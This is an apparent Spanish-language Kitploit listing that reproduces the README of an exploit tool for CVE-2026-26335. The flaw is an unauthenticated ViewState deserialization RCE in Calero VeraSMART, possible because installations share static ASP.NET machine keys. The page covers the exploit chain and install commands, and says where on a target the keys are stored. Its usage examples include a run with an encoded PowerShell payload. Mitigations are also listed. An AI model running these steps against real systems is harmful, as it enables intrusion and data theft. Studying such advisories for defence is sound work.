Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-26335-Calero-VeraSMART-RCE — Exploit automatizado para CVE-2026-26335, una RCE crítica no autenticada en Calero VeraSMART mediante ViewState de ASP.NET falsificado usando claves de máquina estáticas. Incluye descubrimiento de endpoints, generación de payloads y ejecución de comandos. | Kitploit
Herramientas/GitHubGitHub/mbanyamer/cve-2026-26335-calero-verasmart-rce
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónRed Teaming
GitHubmbanyamer/cve-2026-26335-calero-verasmart-rce

CVE-2026-26335-Calero-VeraSMART-RCE

Exploit automatizado para CVE-2026-26335, una RCE crítica no autenticada en Calero VeraSMART mediante ViewState de ASP.NET falsificado usando claves de máquina estáticas. Incluye descubrimiento de endpoints, generación de payloads y ejecución de comandos.

Ver Repositorio
110hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

👤 Autor

Mohammed Idrees Banyamer Investigador de Seguridad

  • GitHub: https://github.com/mbanyamer
  • Instagram: https://instagram.com/banyamer_security

CVE-2026-26335 - Exploit RCE de ViewState en Calero VeraSMART

CVE Severity CVSS Platform ASP.NET Python License Author


📌 Descripción

CVE‑2026‑26335 es una vulnerabilidad crítica de ejecución remota de código sin autenticación en Calero VeraSMART (anterior a 2022 R1).

La aplicación utiliza claves de máquina ASP.NET estáticas y codificadas compartidas entre instalaciones.
Un atacante con estas claves puede forjar un ViewState ASP.NET malicioso y desencadenar deserialización del lado del servidor → RCE.

Este exploit automatiza:

  • Descubrimiento del endpoint ViewState
  • Extracción de __VIEWSTATEGENERATOR
  • Generación de payload con ysoserial
  • Entrega de ViewState firmado
  • Ejecución de comandos

⚠️ Impacto

  • RCE sin autenticación
  • Compromiso del usuario de IIS
  • Movimiento lateral en el dominio
  • Exfiltración de datos
  • Persistencia mediante webshell

🧠 Causa Raíz

CWE‑321 — Claves criptográficas codificadas

Las implementaciones de VeraSMART reutilizan la misma machineKey de ASP.NET:

root@kitploit:~
<machineKey validationKey="STATIC_KEY"
           decryptionKey="STATIC_KEY"
           validation="SHA1"
           decryption="AES" />

Cualquier atacante con las claves de una instalación puede atacar todas.


🛠 Requisitos

  • Python 3
  • ysoserial.net
  • Claves de máquina de VeraSMART
  • Acceso de red a IIS

⚙️ Instalación

root@kitploit:~
git clone https://github.com/mbanyamer/CVE-2026-26335-VeraSMART-RCE.git
cd CVE-2026-26335-VeraSMART-RCE
wget https://github.com/pwntester/ysoserial.net/releases/latest/download/ysoserial.exe

🔑 Obtención de las Claves de Máquina

Las claves no son públicas. Obténgalas del objetivo:

root@kitploit:~
C:\Program Files (x86)\Veramark\VeraSMART\WebRoot\web.config

O mediante la lectura de archivos complementaria:

CVE‑2026‑26333


🚀 Uso

Verificar vulnerabilidad

root@kitploit:~
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY --check-only -v

Ejecutar comando

root@kitploit:~
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY -c "whoami"

Endpoint específico

root@kitploit:~
python3 exploit.py -t https://target-ip -vk KEY -dk KEY -e /Login.aspx -c "powershell -enc ZQBjAGgAbwAgAEgAYQBjAGsAZQBkAA=="

Depuración con proxy

root@kitploit:~
python3 exploit.py -t https://target-ip -vk KEY -dk KEY --proxy http://127.0.0.1:8080 -v

📡 Flujo de Explotación

  1. Encontrar el endpoint ViewState
  2. Extraer el generador
  3. Generar payload firmado
  4. Enviar ViewState forjado
  5. Deserialización en ASP.NET
  6. Ejecución de comandos

📊 CVSS

9.8 — Crítico AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


🧪 Probado En

  • VeraSMART 2020
  • VeraSMART 2021
  • VeraSMART 2022 (pre‑R1)
  • Windows Server 2016/2019
  • IIS 10
  • ASP.NET 4.x

🔒 Mitigación

Corregido en VeraSMART 2022 R1:

  • Claves de máquina únicas
  • Endurecimiento de ViewState
  • Almacenamiento seguro de claves

Soluciones alternativas:

  • Rotar machineKey
  • Deshabilitar ViewState
  • Restringir la exposición de IIS
  • Reglas WAF para ViewState

📚 Referencias

  • https://www.vulncheck.com/advisories/calero-verasmart-2022-r1-static-iis-machine-keys-enable-viewstate-rce
  • https://www.calero.com/

⚖️ Aviso Legal

Solo para fines educativos y pruebas autorizadas. Úselo únicamente en sistemas que posea o para los que tenga permiso de evaluación.


👤 Autor

Mohammed Idrees Banyamer Investigador de Seguridad

  • GitHub: https://github.com/mbanyamer
  • Instagram: https://instagram.com/banyamer_security

📊 Diagrama del Exploit

El siguiente diagrama ilustra la cadena de explotación de CVE‑2026‑26335 en Calero VeraSMART, donde las claves de máquina ASP.NET estáticas permiten forjar un ViewState malicioso que conduce a la ejecución remota de código.

root@kitploit:~
flowchart LR
    A[Attacker] --> B[Obtain VeraSMART machineKey]
    B --> C[Discover ViewState endpoint]
    C --> D[Extract __VIEWSTATEGENERATOR]
    D --> E[Generate malicious ViewState via ysoserial]
    E --> F[Sign payload with machineKey]
    F --> G[Send forged POST request]
    G --> H[ASP.NET ViewState deserialization]
    H --> I[TypeConfuseDelegate gadget]
    I --> J[Remote Code Execution on IIS]
Descargar herramienta